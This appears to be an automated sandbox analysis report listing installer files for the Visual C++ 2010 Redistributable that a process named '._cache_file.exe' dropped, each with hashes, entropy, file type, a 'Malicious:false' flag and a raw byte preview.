                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):18264
                                                                                            Entropy (8bit):5.548909804205606
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:eRBvnUfwVWBC623DV3SD1tt9WfXHT7nMsmxeW1QKPnEtObMacxc8hjeyveCXgFK1:e/C6+URiD1vwLoPeW1LXci2jpvaFHM
                                                                                            MD5:7EF74AF6AB5760950A1D233C582099F1
                                                                                            SHA1:BF79FF66346907446F4F95E1E785A03CA108EB5D
                                                                                            SHA-256:658398F1B68D49ABD37FC3B438CD564992D4100ED2A0271CBF83173F33400928
                                                                                            SHA-512:BBBB099AD24F41785706033962ACFC75039F583BEED40A7CDC8EDA366AB2C77F75A5B2792CF6AACB80B39B6B1BB84ECE372BE926FF3F51028FB404D2F6334D78
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........,...............................................P......O.....@.......................................... ...*...........0..X............................................................................................text...G...........................@..@.rsrc....0... ...*..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\1049\eula.rtf

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                            Category:dropped
                                                                                            Size (bytes):213363
                                                                                            Entropy (8bit):4.934134633374225
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:D/fSz7yMsMyN1FyRtXSWS3SoSalsySMDS7SmSJ8SUSPsBa5IqDSySipSAS6ASGS+:pG
                                                                                            MD5:5B95EFBC01DC97EE9A6C6F64A49AA62D
                                                                                            SHA1:A99C984A0D5E316FE60D588A3519F2D5C805C1DE
                                                                                            SHA-256:0CFACFF2B63121AD1D71376E4A3799B93B7E6D278209FE4806CCA0F74830CFC1
                                                                                            SHA-512:A0B19864E68945A74BCE24C8D5EB0050ABB66C6FF6A53D0482FFA70E93EEE2957608BB9BDE535718D56CD5D7509B4DD7A1786C99BC2120344293234B7A6C2A3B
                                                                                            Malicious:false
                                                                                            Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe2052\themelangcs1025{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman{\*\falt ?l?r ???fc};}..{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New{\*\falt Arial};}..{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol{\*\falt Times};}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings{\*\falt Symbol};}..{\f11\fbidi \fmodern\fcharset128\fprq1{\*\panose 02020609040205080304}MS Mincho{\*\falt ?l?r ??\'81\'66c};}{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt ???????????????????????????????};}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math{\*\falt Calisto MT};}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\p

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\2052\LocalizedData.xml

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (390), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):31138
                                                                                            Entropy (8bit):4.240036868712424
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:4QD7cJwYXzOnyqqgafOAXUmUfMcq0JywXk83GJPupIoxnb/2v:4QD7cJxXC/qgaffXUmUi0JyoknJY9b+v
                                                                                            MD5:150B5C3D1B452DCCBE8F1313FDA1B18C
                                                                                            SHA1:7128B6B9E84D69C415808F1D325DD969B17914CC
                                                                                            SHA-256:6D4EB9DCA1CBCD3C2B39A993133731750B9FDF5988411F4A6DA143B9204C01F2
                                                                                            SHA-512:A45A1F4F19A27558E08939C7F63894FF5754E6840DB86B8C8C68D400A36FB23179CAFF164D8B839898321030469B56446B5A8EFC5765096DEE5E8A746351E949
                                                                                            Malicious:false
                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.X.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".dk.[..z.^..Bl.O(u .x.6.4. .s^.S.0.N..(Wdks^.S.N.[.dk.z.^.0"./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.I.A.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".dk.[..z.^..Bl.O(u .I.A.6.4. .s^.S.0.N..(Wdks^.S.N.[.dk.z.^.0"./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.S.u.p.p.o.r.t.e.d.O.S.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".dk.d\O.|.~.N/e.c .M.i.c.r.o.s.o.f.t. .V.i.s.u.a.l. .C.+.+. .2.0.1.0. .R.e.d.i.s.t.r.i.b.u.t.a.b.l.e..0"./.>..... . . . . . .<.

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\2052\SetupResources.dll

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):14168
                                                                                            Entropy (8bit):6.010838262457833
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:rsLnUfwVWtTXjuQShyjK7tWUEW5IQKPnEtObMacxc8hjeyveCXMOV:4eCTFhMKZWUEW5ILXci2jpvP
                                                                                            MD5:407CDB7E1C2C862B486CDE45F863AE6E
                                                                                            SHA1:308AEEBEB1E1663ACA26CE880191F936D0E4E683
                                                                                            SHA-256:9DD9D76B4EF71188B09F3D074CD98B2DE6EA741530E4EA19D539AE3F870E8326
                                                                                            SHA-512:7B4F43FC24EB30C234F2713C493B3C13928C591C77A3017E8DD806A41CCFEDD53B0F748B5072052F8F9AC43236E8320B19D708903E3F06C59C6ED3C12722494E
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........................................................@.......y....@.......................................... ............... ..X............................................................................................text...G...........................@..@.rsrc.... ... ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\2052\eula.rtf

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                            Category:dropped
                                                                                            Size (bytes):225202
                                                                                            Entropy (8bit):4.985888615397263
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:0pvaMOA6EOEGJA7JDnbyiBTmAO3FQ31Rdz5Zq3Kho:6v+Ez0
                                                                                            MD5:6E5BDDF58163B11C79577B35A87A4424
                                                                                            SHA1:8AAA1008360F7B255A6A88AD02D3A00DEB8B0AE6
                                                                                            SHA-256:D4A26E3756437CA8BA132AE3A73AA7A829478A847D6B9AB69A8090515CE9A60A
                                                                                            SHA-512:21DD9D754C0A3A383F20259E87AA4769D6ECB36753039DCE8B644E16E0ABC3C94B4B850648E0369474C914655140E7F3CC3E808ED27E70892A863F61F8588C6E
                                                                                            Malicious:false
                                                                                            Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch31505\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe2052\themelangcs1025{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman{\*\falt ?l?r ???fc};}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New{\*\falt Arial};}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol{\*\falt Times};}..{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings{\*\falt Symbol};}{\f11\fbidi \fmodern\fcharset128\fprq1{\*\panose 02020609040205080304}MS Mincho{\*\falt ?l?r ??\'81\'66c};}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt ??????????????????????????\'a1\'a7????};}{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math{\*\falt Calisto MT};}..{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma{\*\falt ?? ??};}{\f39\fbidi

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\3082\LocalizedData.xml

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (616), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):40912
                                                                                            Entropy (8bit):3.5296761558263756
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:4fcA4U4d+uYWFHO/xGeftjG2QDu7Jr++dP8z3AzOrv:BoZWFu//xWCJi8Pg32Y
                                                                                            MD5:05A95593C61C744759E52CAF5E13502E
                                                                                            SHA1:0054833D8A7A395A832E4C188C4D012301DD4090
                                                                                            SHA-256:1A3E5E49DA88393A71EA00D73FEE7570E40EDB816B72622E39C7FCD09C95EAD1
                                                                                            SHA-512:00AEE4C02F9D6374560F7D2B826503AAB332E1C4BC3203F88FE82E905471EC43F92F4AF4FC52E46F377E4D297C2BE99DAF94980DF2CE7664C169552800264FD3
                                                                                            Malicious:false
                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.X.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".E.s.t.e. .p.r.o.g.r.a.m.a. .d.e. .i.n.s.t.a.l.a.c.i...n. .r.e.q.u.i.e.r.e. .u.n.a. .p.l.a.t.a.f.o.r.m.a. .x.6.4... .N.o. .s.e. .p.u.e.d.e. .i.n.s.t.a.l.a.r. .e.n. .e.s.t.a. .p.l.a.t.a.f.o.r.m.a..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.I.A.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".E.s.t.e. .p.r.o.g.r.a.m.a. .d.e. .i.n.s.t.a.l.a.c.i...n. .r.e.q.u.i.e.r.e. .u.n.a. .p.l.a.t.a.f.o.r.m.a. .I.A.6.4... .N.o. .s.e. .p.u.e.d.e. .i.n.s.t.a.l.a.r. .e.n. .e.s.t.a. .p.l.a.t.

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\3082\SetupResources.dll

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):18776
                                                                                            Entropy (8bit):5.182140892959793
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:ZikgnUfwVWVCe8b1S2U85ZTYG1lmW+eWaQKPnEtObMacxc8hjXHUz1TrOYL18:Zlv6Lbg2zZTf1lmW+eWaLXci2jXHUx8
                                                                                            MD5:B057315A8C04DF29B7E4FD2B257B75F4
                                                                                            SHA1:D674D066DF8D1041599FCBDB3BA113600C67AE93
                                                                                            SHA-256:51B174AE7EE02D8E84C152D812E35F140A61814F3AECD64E0514C3950060E9FE
                                                                                            SHA-512:F1CD510182DE7BBF8D45068D1B3F72DE58C7B419EFC9768765DF6C180AB3E2D94F3C058143095A66C05BCB70B589D1A5061E5FEE566282E5DB49FFBDEA3C672F
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........................................................P............@.......................................... .. *...........2..X............................................................................................text...G...........................@..@.rsrc....0... ...,..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\3082\eula.rtf

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                            Category:dropped
                                                                                            Size (bytes):152458
                                                                                            Entropy (8bit):5.013297113523102
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:4zkouwFDNSMUYugRJA8J/snalBEm0OgKXIJR10GZybh2U:4zDNIYt
                                                                                            MD5:A920D4F55EAE5FEBAB1082AB2BCC2439
                                                                                            SHA1:CBD631427871B620E9C95417788BFCDD1CD0A2A5
                                                                                            SHA-256:2FFF2122C4D176E074365775227D4208AF48F2F921BE7623EDC315CD345ACF0B
                                                                                            SHA-512:28135FBD9D940F0DEEC7A059AB2998B034575CC5D6DD31B1BE501B60689860478B0A0AB5183C69B2ACBBB9C1A074BBAA215960B3FACC6A9A3B0170E27E7B2B47
                                                                                            Malicious:false
                                                                                            Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe2052\themelangcs1025{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman{\*\falt ?l?r ???fc};}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New{\*\falt Arial};}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol{\*\falt Times};}..{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings{\*\falt Symbol};}{\f11\fbidi \fmodern\fcharset128\fprq1{\*\panose 02020609040205080304}MS Mincho{\*\falt ?l?r ??\'81\'66c};}..{\f13\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt ????????????????????????????\'a8\'ac??};}{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math{\*\falt Calisto MT};}..{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma{\*\falt ?? ??};}{\f39\fbidi \fsw

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\DHtmlHeader.html

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:HTML document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):16118
                                                                                            Entropy (8bit):3.6434775915277604
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:7Ddx3KOTczFQ21Kp4n5DTx1iDecPeLHLHQFJFjZWblWUxFzJzcKHjT:fdsOT01KcBUFJFEWUxFzvHH
                                                                                            MD5:CD131D41791A543CC6F6ED1EA5BD257C
                                                                                            SHA1:F42A2708A0B42A13530D26515274D1FCDBFE8490
                                                                                            SHA-256:E139AF8858FE90127095AC1C4685BCD849437EF0DF7C416033554703F5D864BB
                                                                                            SHA-512:A6EE9AF8F8C2C7ACD58DD3C42B8D70C55202B382FFC5A93772AF7BF7D7740C1162BB6D38A4307B1802294A18EB52032D410E128072AF7D4F9D54F415BE020C9A
                                                                                            Malicious:false
                                                                                            Preview:..<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C././.D.T.D. .X.H.T.M.L. .1...1././.E.N.". .".h.t.t.p.:././.w.w.w...w.3...o.r.g./.T.R./.x.h.t.m.l.1.1./.D.T.D./.x.h.t.m.l.1.1...d.t.d.".>.....<.!.-.-. .T.h.e. .E.x.t.e.n.d.e.d. .C.o.p.y.r.i.g.h.t./.T.r.a.d.e.m.a.r.k. .L.a.n.g.u.a.g.e. .R.e.s.i.d.e.s. .A.t.:. .h.t.t.p.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.i.n.f.o./.c.p.y.r.t.I.n.f.r.g...h.t.m. .-.-.>.....<.h.t.m.l. .x.m.l.n.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.1.9.9.9./.x.h.t.m.l.".>.....<.h.e.a.d.>.......<.m.e.t.a. .h.t.t.p.-.e.q.u.i.v.=.".C.o.n.t.e.n.t.-.T.y.p.e.". .c.o.n.t.e.n.t.=.".t.e.x.t./.h.t.m.l.;. .c.h.a.r.s.e.t.=.u.t.f.-.1.6."./.>.<.b.a.s.e. .t.a.r.g.e.t.=."._.b.l.a.n.k."./.>.......<.s.t.y.l.e. .t.y.p.e.=.".t.e.x.t./.c.s.s.".>.........h.t.m.l.{.o.v.e.r.f.l.o.w.:.s.c.r.o.l.l.}.........b.o.d.y.{.f.o.n.t.-.s.i.z.e.:.1.0.p.t.;.f.o.n.t.-.f.a.m.i.l.y.:.V.e.r.d.a.n.a.;.c.o.l.o.r.:.#.0.0.0.0.0.0.;.b.a.c.k.g.r.o.u.n.d.-.c.o.l.o.r.:.#.F.0.F.0.F.0.}...........h.e.a.d.e.r.

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\DisplayIcon.ico

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 13 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):88533
                                                                                            Entropy (8bit):7.210526848639953
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:xWayqxMQP8ZOs0JOG58d8vo2zYOvvHAj/4/aXj/Nhhg73BVp5vEdb:e/gB4H8vo2no0/aX7C7Dct
                                                                                            MD5:F9657D290048E169FFABBBB9C7412BE0
                                                                                            SHA1:E45531D559C38825FBDE6F25A82A638184130754
                                                                                            SHA-256:B74AD253B9B8F9FCADE725336509143828EE739CC2B24782BE3ECFF26F229160
                                                                                            SHA-512:8B93E898148EB8A751BC5E4135EFB36E3AC65AF34EAAC4EA401F1236A2973F003F84B5CFD1BBEE5E43208491AA1B63C428B64E52F7591D79329B474361547268
                                                                                            Malicious:false
                                                                                            Preview:..............(...............h...............h...f... .............. .............. ..........^...00......h....#..00..........n)..00...........8........ .h....T.. .... .....&Y..00.... ..%...i........ ._...v...(....... ....................................................................................................w......x......................x..ww...........h...............................w.....w.x..........x................xwvwg.................................................................(....... ...................................jO:.mS?.qWD.v\I.|cP..kX..q_..sa..yg..{j...p..nh..pj..uo..|u..xq..|r..|u..rx..zy..|w.}.y...q...d...y...{......S...]..d..i..r..|...j..j...y...e...k...l..q...y...~...v...y..s..s..m...m...l...n...k...t...l.............................................................................................................................................................................................

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\Graphics\Print.ico

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):1150
                                                                                            Entropy (8bit):4.923507556620034
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:dOjNyw2aSGZHJi4U7Wf0mDX+QF7s/AemFAh:MjNyw/0NW9DOp/ANC
                                                                                            MD5:7E55DDC6D611176E697D01C90A1212CF
                                                                                            SHA1:E2620DA05B8E4E2360DA579A7BE32C1B225DEB1B
                                                                                            SHA-256:FF542E32330B123486797B410621E19EAFB39DF3997E14701AFA4C22096520ED
                                                                                            SHA-512:283D381AA396820B7E15768B20099D67688DA1F6315EC9F7938C2FCC3167777502CDED0D1BEDDF015A34CC4E5D045BCB665FFD28BA2FBB6FAF50FDD38B31D16E
                                                                                            Malicious:false
                                                                                            Preview:............ .h.......(....... ..... .....@.........................................................................................t?.fR.|bN.y_K.v\H.rXD.oUA.kQ=.hN:.eK7.cI5.cI5.cI5i.........th<..z............................................cI5.cI5...................................................qXE.cI5.cI5.......~.............................................}eS.kR>.cI5......................................................q`.w^L.cI5..............................z..~n..sb..jX.{bP.t[H..~m..kY.nT@.......................................................{..wf.zaM.......vO.......................q..r`.}cQ.w]J..lZ.......t.x^J...........}Z..................................z`M........{aM...............0..............................jY.{aO...........................................................x^K.x^Kk.....................................................n\.y_L...........................r...............................y_L.x^K&.........................s.............

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\Graphics\Rotate1.ico

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):894
                                                                                            Entropy (8bit):2.5118974066097444
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:kRKqNllGuv/ll2dL/rK//dlQt0tlWMlMN8Fq/wbD4tNZDlNc367YCm6p+Wvtjlpr:pIGOmDAQt8n+uNbctNZ5w6AsXjKHRp5c
                                                                                            MD5:26A00597735C5F504CF8B3E7E9A7A4C1
                                                                                            SHA1:D913CB26128D5CA1E1AC3DAB782DE363C9B89934
                                                                                            SHA-256:37026C4EA2182D7908B3CF0CEF8A6F72BDDCA5F1CFBC702F35B569AD689CF0AF
                                                                                            SHA-512:08CEFC5A2B625F261668F70CC9E1536DC4878D332792C751884526E49E7FEE1ECFA6FCCFDDF7BE80910393421CC088C0FD0B0C27C7A7EFF2AE03719E06022FDF
                                                                                            Malicious:false
                                                                                            Preview:..............h.......(....... .......................................................................................................................................................................................t.r........................................p.nn.l|.z..........................................g.e.......................................................................................P.N..........................................P.OG.FP.O..........................................?.>...................................................................................................+.*..........................................3.2%.$+.*..........................................!. ............{.{.............................................................................................~.~..................................G.......................................G..........

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\Graphics\Rotate2.ico

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):894
                                                                                            Entropy (8bit):2.5178766234336925
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:pmZX5+9wQaxWbwW3h/7eHzemn0iLHRp5c:Md5EaxWbh/Cnt4
                                                                                            MD5:8419CAA81F2377E09B7F2F6218E505AE
                                                                                            SHA1:2CF5AD8C8DA4F1A38AAB433673F4DDDC7AE380E9
                                                                                            SHA-256:DB89D8A45C369303C04988322B2774D2C7888DA5250B4DAB2846DEEF58A7DE22
                                                                                            SHA-512:74E504D2C3A8E82925110B7CFB45FDE8A4E6DF53A188E47CF22D664CBB805EBA749D2DB23456FC43A86E57C810BC3D9166E7C72468FBD736DA6A776F8CA015D1
                                                                                            Malicious:false
                                                                                            Preview:..............h.......(....... ...............................................................................................................................................................................................................................................................................................................................................................................r.p..........................................q.oj.hq.o..........................................b.`...................................................................................................J.I..................|.|...y.y...............Q.PC.BF.E..........................................>.=.........".!..........................................2.1".!'.&..........................................".!.....................................G.......................................G..........

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\Graphics\Rotate3.ico

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):894
                                                                                            Entropy (8bit):2.5189797450574103
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:pPrMIMxPWk3AyORrabBQ+gra2/MXWM4xfQHRp5c:1gxPbXlBQ+gr1ffO4
                                                                                            MD5:924FD539523541D42DAD43290E6C0DB5
                                                                                            SHA1:19A161531A2C9DBC443B0F41B97CBDE7375B8983
                                                                                            SHA-256:02A7FE932029C6FA24D1C7CC06D08A27E84F43A0CBC47B7C43CAC59424B3D1F6
                                                                                            SHA-512:86A4C5D981370EFA20183CC4A52C221467692E91539AC38C8DEF1CC200140F6F3D9412B6E62FAF08CA6668DF401D8B842C61B1F3C2A4C4570F3B2CEC79C9EE8B
                                                                                            Malicious:false
                                                                                            Preview:..............h.......(....... .................................................................................................................................................................................................................................................................................................................................................................................................................z.z...{.{...........................................................................................................................................................s.q..........................................y.wl.jl.j...............3.2#."*.)..................f.d.........E.D.........(.'..............................U.TE.DF.E..........................................E.D.....................................G.......................................G..........

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\Graphics\Rotate4.ico

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):894
                                                                                            Entropy (8bit):2.5119705312617957
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:kRK///FleTxml+SzNaoT9Q0/lHOmMdrYln8OUo/XRWl2XOXFBYpqnHp/p5c:p///FPwxUrMunUofRReFNHRp5c
                                                                                            MD5:BB55B5086A9DA3097FB216C065D15709
                                                                                            SHA1:1206C708BD08231961F17DA3D604A8956ADDCCFE
                                                                                            SHA-256:8D82FF7970C9A67DA8134686560FE3A6C986A160CED9D1CC1392F2BA75C698AB
                                                                                            SHA-512:DE9226064680DA6696976A4A320E08C41F73D127FBB81BF142048996DF6206DDB1C2FE347C483CC8E0E50A00DAB33DB9261D03F1CD7CA757F5CA7BB84865FCA9
                                                                                            Malicious:false
                                                                                            Preview:..............h.......(....... .............................................................................................................................................................................................................y.y...|.|.............................................................................................................................................................................................................................................,.+".!,.+.........................................(.'......................................................................................=.<..........................................S.RC.BG.F.............................j.h.........H.G..............................y.wj.hi.g..........................................j.h.....................................G.......................................G..........

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\Graphics\Rotate5.ico

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):894
                                                                                            Entropy (8bit):2.5083713071878764
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:kRKi+Blqkl/QThulVDYa5a//ItEl/aotzauakg//5aM1lkl05Kaag2/JqnHp/p5c:pXBHehqSayIylrtBg/bk4AgzHRp5c
                                                                                            MD5:3B4861F93B465D724C60670B64FCCFCF
                                                                                            SHA1:C672D63C62E00E24FBB40DA96A0CC45B7C5EF7F0
                                                                                            SHA-256:7237051D9AF5DB972A1FECF0B35CD8E9021471740782B0DBF60D3801DC9F5F75
                                                                                            SHA-512:2E798B0C9E80F639571525F39C2F50838D5244EEDA29B18A1FAE6C15D939D5C8CD29F6785D234B54BDA843A645D1A95C7339707991A81946B51F7E8D5ED40D2C
                                                                                            Malicious:false
                                                                                            Preview:..............h.......(....... .................................................................................................{.{...~.~.......................................................................................}.}.........................................................).(#."2.1..........................................).(...................................................................................................=.<..........................................N.ME.DN.M..........................................M.L.......................................................................................e.c..........................................z.xl.jm.k........................................r.p........................................................................................................................G.......................................G..........

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\Graphics\Rotate6.ico

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):894
                                                                                            Entropy (8bit):2.5043420982993396
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:pjs+/hlRwx5REHevtOkslTaGWOpRFkpRHkCHRp5c:tZ/u+HeilBh/F+Rd4
                                                                                            MD5:70006BF18A39D258012875AEFB92A3D1
                                                                                            SHA1:B47788F3F8C5C305982EB1D0E91C675EE02C7BEB
                                                                                            SHA-256:19ABCEDF93D790E19FB3379CB3B46371D3CBFF48FE7E63F4FDCC2AC23A9943E4
